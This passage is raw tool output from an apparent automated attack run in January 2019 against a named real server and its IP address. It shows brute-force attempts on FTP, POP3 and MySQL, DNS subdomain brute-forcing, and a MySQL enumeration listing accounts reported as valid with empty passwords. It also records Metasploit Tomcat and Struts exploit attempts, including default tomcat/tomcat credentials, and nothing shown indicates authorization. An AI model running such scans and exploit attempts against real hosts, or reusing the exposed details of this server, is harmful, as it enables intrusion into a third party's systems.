3065NSE: [ftp-brute] passwords: Time limit 3m00s exceeded.
3066Nmap scan report for server.webid.co.il (62.90.134.182)
3067Host is up (0.23s latency).
3068
3069PORT STATE SERVICE VERSION
307021/tcp open ftp ProFTPD
3071| ftp-brute:
3072| Accounts: No valid accounts found
3073|_ Statistics: Performed 2604 guesses in 180 seconds, average tps: 14.2
3074Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3075Device type: general purpose|storage-misc|firewall|VoIP phone
3076Running (JUST GUESSING): Linux 2.6.X|3.X (91%), Synology DiskStation Manager 5.X (90%), WatchGuard Fireware 11.X (89%), Grandstream embedded (85%)
3077OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:watchguard:fireware:11.8 cpe:/h:grandstream:gxv3275
3078Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), WatchGuard Fireware 11.8 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
3079No exact OS matches for host (test conditions non-ideal).
3080Network Distance: 17 hops
3081Service Info: OS: Unix
3082
3083TRACEROUTE (using port 21/tcp)
3084HOP RTT ADDRESS
30851 146.37 ms 10.246.200.1
30862 146.44 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
30873 146.43 ms 176.10.83.34
30884 146.42 ms sfia-b2-link.telia.net (62.115.148.144)
30895 178.37 ms prag-bb1-link.telia.net (80.91.247.82)
30906 178.42 ms ffm-bb3-link.telia.net (62.115.121.118)
30917 178.45 ms ffm-b1-link.telia.net (62.115.121.7)
30928 179.25 ms 80.239.196.190
30939 ...
309410 233.20 ms gw2-3-1-4-hfa-gw2-fra.nv.net.il (212.143.12.76)
309511 235.52 ms 212.143.7.22
309612 237.42 ms core1-rha2-0-0-core1-hfa.nv.net.il (207.232.0.17)
309713 236.62 ms core1-rha-1-0-0-core1-hfa-5-0-7.nv.net.il (212.143.12.117)
309814 237.42 ms 212.143.201.190
309915 230.82 ms 82-166-37-254.barak-online.net (82.166.37.254)
310016 231.70 ms 62-90-134-178.barak.net.il (62.90.134.178)
310117 232.39 ms server.webid.co.il (62.90.134.182)
3102######################################################################################################################################
3103Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:25 EST
3104Nmap scan report for server.webid.co.il (62.90.134.182)
3105Host is up (0.23s latency).
3106
3107PORT STATE SERVICE VERSION
310853/tcp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
3109|_dns-fuzz: Server didn't response to our probe, can't fuzz
3110| dns-nsec-enum:
3111|_ No NSEC records found
3112| dns-nsec3-enum:
3113|_ DNSSEC NSEC3 not supported
3114| dns-nsid:
3115|_ bind.version: 9.9.4-RedHat-9.9.4-61.el7
3116|_dns-zone-transfer: ERROR: Script execution failed (use -d to debug)
3117Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3118Device type: general purpose|firewall|storage-misc|VoIP phone
3119Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
3120OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
3121Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
3122No exact OS matches for host (test conditions non-ideal).
3123Network Distance: 17 hops
3124Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
3125
3126Host script results:
3127| dns-blacklist:
3128| SPAM
3129|_ l2.apews.org - SPAM
3130| dns-brute:
3131| DNS Brute-force hostnames:
3132| ns1.webid.co.il - 62.90.134.182
3133| ns2.webid.co.il - 212.150.246.99
3134| mail.webid.co.il - 62.90.134.182
3135| www.webid.co.il - 62.90.134.182
3136| cms.webid.co.il - 62.90.134.182
3137| ftp.webid.co.il - 62.90.134.182
3138| server.webid.co.il - 62.90.134.182
3139|_ smtp.webid.co.il - 62.90.134.182
3140
3141TRACEROUTE (using port 53/tcp)
3142HOP RTT ADDRESS
31431 145.16 ms 10.246.200.1
31442 145.25 ms 193.9.115.113
31453 145.22 ms vlan299.bb1.sof1.bg.m247.com (176.10.83.34)
31464 145.25 ms sfia-b2-link.telia.net (62.115.148.144)
31475 177.07 ms 80.91.253.248
31486 177.12 ms ffm-bb3-link.telia.net (62.115.121.118)
31497 180.34 ms ffm-b1-link.telia.net (62.115.116.160)
31508 180.31 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
31519 ...
315210 231.35 ms 212.143.12.76
315311 232.67 ms core1-0-1-0-2-gw2.hfa.nv.net.il (212.143.7.41)
315412 233.83 ms core2-rha-2-0-0-core2-hfa-5-0-7.nv.net.il (212.143.12.119)
315513 235.90 ms 212.143.201.205
315614 235.84 ms po221.srvc3.rha.nv.net.il (212.143.201.188)
315715 231.43 ms 82-166-37-254.barak-online.net (82.166.37.254)
315816 232.20 ms 62-90-134-178.barak.net.il (62.90.134.178)
315917 233.34 ms server.webid.co.il (62.90.134.182)
3160#######################################################################################################################################
3161wig - WebApp Information Gatherer
3162
3163
3164Scanning http://62.90.134.182...
3165_________________________________________ SITE INFO _________________________________________
3166IP Title
316762.90.134.182
3168
3169__________________________________________ VERSION __________________________________________
3170Name Versions Type
3171Roundcube CMS
3172phpMyAdmin CMS
3173Apache 2.4.10 | 2.4.11 | 2.4.12 | 2.4.4 | 2.4.5 | 2.4.6 | 2.4.7 Platform
3174 2.4.8 | 2.4.9
3175
3176_____________________________________________________________________________________________
3177Time: 29.4 sec Urls: 446 Fingerprints: 40401
3178#######################################################################################################################################
3179HTTP/1.1 200 OK
3180Server: nginx
3181Date: Wed, 23 Jan 2019 09:27:50 GMT
3182Content-Type: text/html
3183Content-Length: 43
3184Connection: keep-alive
3185Vary: Accept-Encoding
3186X-Accel-Version: 0.01
3187Last-Modified: Mon, 18 Jun 2018 11:43:36 GMT
3188ETag: "2b-56ee9136e8a00"
3189Accept-Ranges: bytes
3190Vary: User-Agent
3191#######################################################################################################################################
3192Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:27 EST
3193NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
3194NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
3195NSE: [pop3-brute] passwords: Time limit 3m00s exceeded.
3196Nmap scan report for server.webid.co.il (62.90.134.182)
3197Host is up (0.23s latency).
3198
3199PORT STATE SERVICE VERSION
3200110/tcp open pop3 Dovecot DirectAdmin pop3d
3201| pop3-brute:
3202| Accounts: No valid accounts found
3203|_ Statistics: Performed 225 guesses in 183 seconds, average tps: 1.3
3204|_pop3-capabilities: CAPA UIDL RESP-CODES STLS USER AUTH-RESP-CODE SASL(PLAIN) PIPELINING TOP
3205Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3206Device type: general purpose|firewall|storage-misc|VoIP phone
3207Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
3208OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
3209Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
3210No exact OS matches for host (test conditions non-ideal).
3211Network Distance: 16 hops
3212
3213TRACEROUTE (using port 110/tcp)
3214HOP RTT ADDRESS
32151 146.19 ms 10.246.200.1
32162 146.97 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
32173 174.77 ms 176.10.83.34
32184 146.97 ms sfia-b2-link.telia.net (62.115.148.144)
32195 178.41 ms win-bb2-link.telia.net (62.115.119.76)
32206 179.05 ms ffm-bb4-link.telia.net (62.115.133.79)
32217 178.40 ms ffm-b1-link.telia.net (62.115.121.1)
32228 179.09 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
32239 ...
322410 233.92 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
322511 231.01 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
322612 231.03 ms 212.143.7.39
322713 232.28 ms po221.srvc3.rha.nv.net.il (212.143.201.188)
322814 232.24 ms 82.166.37.254
322915 233.54 ms 62-90-134-178.barak.net.il (62.90.134.178)
323016 232.25 ms server.webid.co.il (62.90.134.182)
3231#######################################################################################################################################
3232
3233
3234
3235 AVAILABLE PLUGINS
3236 -----------------
3237
3238 PluginSessionRenegotiation
3239 PluginOpenSSLCipherSuites
3240 PluginHSTS
3241 PluginCertInfo
3242 PluginCompression
3243 PluginSessionResumption
3244 PluginHeartbleed
3245 PluginChromeSha1Deprecation
3246
3247
3248
3249 CHECKING HOST(S) AVAILABILITY
3250 -----------------------------
3251
3252 62.90.134.182:443 => 62.90.134.182:443
3253
3254
3255
3256 SCAN RESULTS FOR 62.90.134.182:443 - 62.90.134.182:443
3257 ------------------------------------------------------
3258
3259 * Deflate Compression:
3260 OK - Compression disabled
3261
3262 * Session Renegotiation:
3263 Client-initiated Renegotiations: OK - Rejected
3264 Secure Renegotiation: OK - Supported
3265
3266 * OpenSSL Heartbleed:
3267 OK - Not vulnerable to Heartbleed
3268
3269 * Certificate - Content:
3270 SHA1 Fingerprint: 2e3f643e5d11a459bd85ab36e5e5593f04c8e51f
3271 Common Name: localhost
3272 Issuer: localhost
3273 Serial Number: 99F758FFACDEEDCB
3274 Not Before: Sep 20 10:18:07 2014 GMT
3275 Not After: Feb 4 10:18:07 2042 GMT
3276 Signature Algorithm: sha1WithRSAEncryption
3277 Public Key Algorithm: rsaEncryption
3278 Key Size: 2048 bit
3279 Exponent: 65537 (0x10001)
3280
3281 * Certificate - Trust:
3282 Hostname Validation: FAILED - Certificate does NOT match 62.90.134.182
3283 Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
3284 Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
3285 Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
3286 Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
3287 Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
3288 Certificate Chain Received: ['localhost', 'COMODO High-Assurance Secure Server CA', 'AddTrust External CA Root', 'GlobalSign Root CA', 'thawte Primary Root CA', 'VeriSign Class 3 Secure Server CA - G3', 'VeriSign Class 3 Public Primary Certification Authority - G5']
3289
3290 * Certificate - OCSP Stapling:
3291 NOT SUPPORTED - Server did not send back an OCSP response.
3292
3293 * SSLV2 Cipher Suites:
3294 Server rejected all cipher suites.
3295
3296 * Session Resumption:
3297 With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
3298 With TLS Session Tickets: OK - Supported
3299
3300 * TLSV1_2 Cipher Suites:
3301 Preferred:
3302 ECDHE-RSA-AES128-GCM-SHA256 ECDH-256 bits 128 bits HTTP 200 OK
3303 Accepted:
3304 ECDHE-RSA-AES256-SHA384 ECDH-256 bits 256 bits HTTP 200 OK
3305 ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits HTTP 200 OK
3306 ECDHE-RSA-AES256-GCM-SHA384 ECDH-256 bits 256 bits HTTP 200 OK
3307 DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits HTTP 200 OK
3308 DHE-RSA-AES256-SHA256 DH-2048 bits 256 bits HTTP 200 OK
3309 DHE-RSA-AES256-SHA DH-2048 bits 256 bits HTTP 200 OK
3310 DHE-RSA-AES256-GCM-SHA384 DH-2048 bits 256 bits HTTP 200 OK
3311 CAMELLIA256-SHA - 256 bits HTTP 200 OK
3312 AES256-SHA256 - 256 bits HTTP 200 OK
3313 AES256-SHA - 256 bits HTTP 200 OK
3314 AES256-GCM-SHA384 - 256 bits HTTP 200 OK
3315 ECDHE-RSA-AES128-SHA256 ECDH-256 bits 128 bits HTTP 200 OK
3316 ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
3317 ECDHE-RSA-AES128-GCM-SHA256 ECDH-256 bits 128 bits HTTP 200 OK
3318 DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits HTTP 200 OK
3319 DHE-RSA-AES128-SHA256 DH-2048 bits 128 bits HTTP 200 OK
3320 DHE-RSA-AES128-SHA DH-2048 bits 128 bits HTTP 200 OK
3321 DHE-RSA-AES128-GCM-SHA256 DH-2048 bits 128 bits HTTP 200 OK
3322 CAMELLIA128-SHA - 128 bits HTTP 200 OK
3323 AES128-SHA256 - 128 bits HTTP 200 OK
3324 AES128-SHA - 128 bits HTTP 200 OK
3325 AES128-GCM-SHA256 - 128 bits HTTP 200 OK
3326 ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits HTTP 200 OK
3327 DES-CBC3-SHA - 112 bits HTTP 200 OK
3328
3329 * TLSV1_1 Cipher Suites:
3330 Preferred:
3331 ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
3332 Accepted:
3333 ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits HTTP 200 OK
3334 DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits HTTP 200 OK
3335 DHE-RSA-AES256-SHA DH-2048 bits 256 bits HTTP 200 OK
3336 CAMELLIA256-SHA - 256 bits HTTP 200 OK
3337 AES256-SHA - 256 bits HTTP 200 OK
3338 ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
3339 DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits HTTP 200 OK
3340 DHE-RSA-AES128-SHA DH-2048 bits 128 bits HTTP 200 OK
3341 CAMELLIA128-SHA - 128 bits HTTP 200 OK
3342 AES128-SHA - 128 bits HTTP 200 OK
3343 ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits HTTP 200 OK
3344 DES-CBC3-SHA - 112 bits HTTP 200 OK
3345
3346 * TLSV1 Cipher Suites:
3347 Preferred:
3348 ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
3349 Accepted:
3350 ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits HTTP 200 OK
3351 DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits HTTP 200 OK
3352 DHE-RSA-AES256-SHA DH-2048 bits 256 bits HTTP 200 OK
3353 CAMELLIA256-SHA - 256 bits HTTP 200 OK
3354 AES256-SHA - 256 bits HTTP 200 OK
3355 ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
3356 DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits HTTP 200 OK
3357 DHE-RSA-AES128-SHA DH-2048 bits 128 bits HTTP 200 OK
3358 CAMELLIA128-SHA - 128 bits HTTP 200 OK
3359 AES128-SHA - 128 bits HTTP 200 OK
3360 ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits HTTP 200 OK
3361 DES-CBC3-SHA - 112 bits HTTP 200 OK
3362
3363 * SSLV3 Cipher Suites:
3364 Server rejected all cipher suites.
3365
3366
3367
3368 SCAN COMPLETED IN 19.16 S
3369 -------------------------
3370Version: 1.11.12-static
3371OpenSSL 1.0.2-chacha (1.0.2g-dev)
3372
3373Connected to 62.90.134.182
3374
3375Testing SSL server 62.90.134.182 on port 443 using SNI name 62.90.134.182
3376
3377 TLS Fallback SCSV:
3378Server supports TLS Fallback SCSV
3379
3380 TLS renegotiation:
3381Secure session renegotiation supported
3382
3383 TLS Compression:
3384Compression disabled
3385
3386 Heartbleed:
3387TLS 1.2 not vulnerable to heartbleed
3388TLS 1.1 not vulnerable to heartbleed
3389TLS 1.0 not vulnerable to heartbleed
3390
3391 Supported Server Cipher(s):
3392Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
3393Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
3394Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
3395Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
3396Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
3397Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
3398Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
3399Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
3400Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
3401Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
3402Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
3403Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
3404Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
3405Accepted TLSv1.2 128 bits AES128-GCM-SHA256
3406Accepted TLSv1.2 256 bits AES256-GCM-SHA384
3407Accepted TLSv1.2 128 bits AES128-SHA256
3408Accepted TLSv1.2 256 bits AES256-SHA256
3409Accepted TLSv1.2 128 bits AES128-SHA
3410Accepted TLSv1.2 256 bits AES256-SHA
3411Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
3412Accepted TLSv1.2 256 bits CAMELLIA256-SHA
3413Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
3414Accepted TLSv1.2 128 bits CAMELLIA128-SHA
3415Accepted TLSv1.2 112 bits DES-CBC3-SHA
3416Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
3417Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
3418Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
3419Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
3420Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
3421Accepted TLSv1.1 128 bits AES128-SHA
3422Accepted TLSv1.1 256 bits AES256-SHA
3423Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
3424Accepted TLSv1.1 256 bits CAMELLIA256-SHA
3425Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
3426Accepted TLSv1.1 128 bits CAMELLIA128-SHA
3427Accepted TLSv1.1 112 bits DES-CBC3-SHA
3428Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
3429Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
3430Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
3431Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
3432Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
3433Accepted TLSv1.0 128 bits AES128-SHA
3434Accepted TLSv1.0 256 bits AES256-SHA
3435Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
3436Accepted TLSv1.0 256 bits CAMELLIA256-SHA
3437Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
3438Accepted TLSv1.0 128 bits CAMELLIA128-SHA
3439Accepted TLSv1.0 112 bits DES-CBC3-SHA
3440
3441 SSL Certificate:
3442Signature Algorithm: sha1WithRSAEncryption
3443RSA Key Strength: 2048
3444
3445Subject: localhost
3446Issuer: localhost
3447
3448Not valid before: Sep 20 10:18:07 2014 GMT
3449Not valid after: Feb 4 10:18:07 2042 GMT
3450#######################################################################################################################################
3451Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:32 EST
3452NSE: [mysql-brute] usernames: Time limit 10m00s exceeded.
3453NSE: [mysql-brute] usernames: Time limit 10m00s exceeded.
3454NSE: [mysql-brute] passwords: Time limit 10m00s exceeded.
3455Nmap scan report for server.webid.co.il (62.90.134.182)
3456Host is up (0.23s latency).
3457
3458PORT STATE SERVICE VERSION
34593306/tcp open mysql MySQL 5.5.60-MariaDB
3460| mysql-brute:
3461| Accounts: No valid accounts found
3462|_ Statistics: Performed 15790 guesses in 600 seconds, average tps: 26.1
3463| mysql-enum:
3464| Valid usernames:
3465| root:<empty> - Valid credentials
3466| netadmin:<empty> - Valid credentials
3467| guest:<empty> - Valid credentials
3468| user:<empty> - Valid credentials
3469| web:<empty> - Valid credentials
3470| sysadmin:<empty> - Valid credentials
3471| administrator:<empty> - Valid credentials
3472| webadmin:<empty> - Valid credentials
3473| admin:<empty> - Valid credentials
3474| test:<empty> - Valid credentials
3475|_ Statistics: Performed 10 guesses in 2 seconds, average tps: 5.0
3476| mysql-info:
3477| Protocol: 10
3478| Version: 5.5.60-MariaDB
3479| Thread ID: 11633341
3480| Capabilities flags: 63487
3481| Some Capabilities: IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, LongPassword, IgnoreSigpipes, SupportsTransactions, Support41Auth, ConnectWithDatabase, LongColumnFlag, Speaks41ProtocolNew, ODBCClient, InteractiveClient, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsCompression, FoundRows, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
3482| Status: Autocommit
3483| Salt: 5(dB[$?Q[SmLrz.t}8=g
3484|_ Auth Plugin Name: mysql_native_password
3485Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3486Device type: general purpose|firewall|storage-misc|VoIP phone
3487Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
3488OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
3489Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
3490No exact OS matches for host (test conditions non-ideal).
3491Network Distance: 17 hops
3492
3493TRACEROUTE (using port 3306/tcp)
3494HOP RTT ADDRESS
34951 144.42 ms 10.246.200.1
34962 144.46 ms 193.9.115.113
34973 144.47 ms 176.10.83.34
34984 144.60 ms sfia-b2-link.telia.net (62.115.148.144)
34995 176.40 ms prag-bb1-link.telia.net (80.91.253.248)
35006 176.64 ms ffm-bb3-link.telia.net (62.115.121.118)
35017 176.44 ms ffm-b1-link.telia.net (62.115.116.164)
35028 177.49 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
35039 ...
350410 230.94 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
350511 233.07 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
350612 234.80 ms core1-0-1-0-1-gw2.hfa.nv.net.il (212.143.7.22)
350713 233.09 ms po231.srvc3.rha.nv.net.il (212.143.201.190)
350814 233.07 ms 82.166.37.254
350915 236.67 ms 82.166.37.254
351016 237.22 ms 62-90-134-178.barak.net.il (62.90.134.178)
351117 233.68 ms server.webid.co.il (62.90.134.182)
3512#######################################################################################################################################
3513 + -- --=[Port 6000 closed... skipping.
3514 + -- --=[Port 6667 closed... skipping.
3515 + -- --=[Port 7001 closed... skipping.
3516 + -- --=[Port 8000 closed... skipping.
3517 + -- --=[Port 8100 closed... skipping.
3518 + -- --=[Port 8080 opened... running tests...
3519
3520 ^ ^
3521 _ __ _ ____ _ __ _ _ ____
3522 ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
3523 | V V // o // _/ | V V // 0 // 0 // _/
3524 |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
3525 <
3526 ...'
3527
3528 WAFW00F - Web Application Firewall Detection Tool
3529
3530 By Sandro Gauci && Wendel G. Henrique
3531
3532Checking http://62.90.134.182:8080
3533Generic Detection results:
3534No WAF detected by the generic detection
3535Number of requests: 14
3536
3537
3538Version: 1.11.12-static
3539OpenSSL 1.0.2-chacha (1.0.2g-dev)
3540
3541Connected to 62.90.134.182
3542
3543Testing SSL server 62.90.134.182 on port 8080 using SNI name 62.90.134.182
3544
3545 TLS Fallback SCSV:
3546Server does not support TLS Fallback SCSV
3547
3548 TLS renegotiation:
3549Session renegotiation not supported
3550
3551 TLS Compression:
3552Compression disabled
3553
3554 Heartbleed:
3555TLS 1.2 not vulnerable to heartbleed
3556TLS 1.1 not vulnerable to heartbleed
3557TLS 1.0 not vulnerable to heartbleed
3558
3559 Supported Server Cipher(s):
3560#######################################################################################################################################
3561Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:52 EST
3562Nmap scan report for server.webid.co.il (62.90.134.182)
3563Host is up (0.23s latency).
3564
3565PORT STATE SERVICE VERSION
35668080/tcp open ssl/http-proxy Apache/2
3567|_http-server-header: Apache/2
3568|_http-vuln-cve2017-5638: ERROR: Script execution failed (use -d to debug)
3569Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3570Device type: general purpose|storage-misc|firewall|VoIP phone
3571Running (JUST GUESSING): Linux 2.6.X|3.X (91%), Synology DiskStation Manager 5.X (90%), WatchGuard Fireware 11.X (89%), Grandstream embedded (85%)
3572OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:watchguard:fireware:11.8 cpe:/h:grandstream:gxv3275
3573Aggressive OS guesses: Linux 2.6.32 (91%), Linux 3.10 (91%), Linux 3.4 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), Linux 2.6.39 (89%), WatchGuard Fireware 11.8 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
3574No exact OS matches for host (test conditions non-ideal).
3575Network Distance: 16 hops
3576
3577TRACEROUTE (using port 8080/tcp)
3578HOP RTT ADDRESS
35791 145.20 ms 10.246.200.1
35802 145.27 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
35813 145.26 ms vlan299.bb1.sof1.bg.m247.com (176.10.83.34)
35824 147.46 ms sfia-b2-link.telia.net (62.115.148.144)
35835 178.66 ms 62.115.119.72
35846 177.40 ms ffm-bb4-link.telia.net (62.115.133.79)
35857 176.95 ms ffm-b1-link.telia.net (62.115.137.165)
35868 178.67 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
35879 ...
358810 232.57 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
358911 234.02 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
359012 233.95 ms 212.143.7.43
359113 235.92 ms po231.srvc3.rha.nv.net.il (212.143.201.190)
359214 235.89 ms 82.166.37.254
359315 235.81 ms 62-90-134-178.barak.net.il (62.90.134.178)
359416 235.76 ms server.webid.co.il (62.90.134.182)
3595#######################################################################################################################################
3596RHOSTS => 62.90.134.182
3597RHOST => 62.90.134.182
3598[-] WAR file not found
3599[*] Auxiliary module execution completed
3600[*] Scanned 1 of 1 hosts (100% complete)
3601[*] Auxiliary module execution completed
3602RPORT => 8080
3603[*] Scanned 1 of 1 hosts (100% complete)
3604[*] Auxiliary module execution completed
3605[*] Attempting to connect to 62.90.134.182:8080
3606[+] No File(s) found
3607[*] Scanned 1 of 1 hosts (100% complete)
3608[*] Auxiliary module execution completed
3609[*] http://62.90.134.182:8080/admin/j_security_check - Checking j_security_check...
3610[*] http://62.90.134.182:8080/admin/j_security_check - Server returned: 404
3611[-] http://62.90.134.182:8080/admin/j_security_check - Unable to enumerate users with this URI
3612[*] Scanned 1 of 1 hosts (100% complete)
3613[*] Auxiliary module execution completed
3614[-] http://62.90.134.182:8080 - Authorization not requested
3615[*] Scanned 1 of 1 hosts (100% complete)
3616[*] Auxiliary module execution completed
3617[-] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
3618[*] Exploit completed, but no session was created.
3619USERNAME => tomcat
3620PASSWORD => tomcat
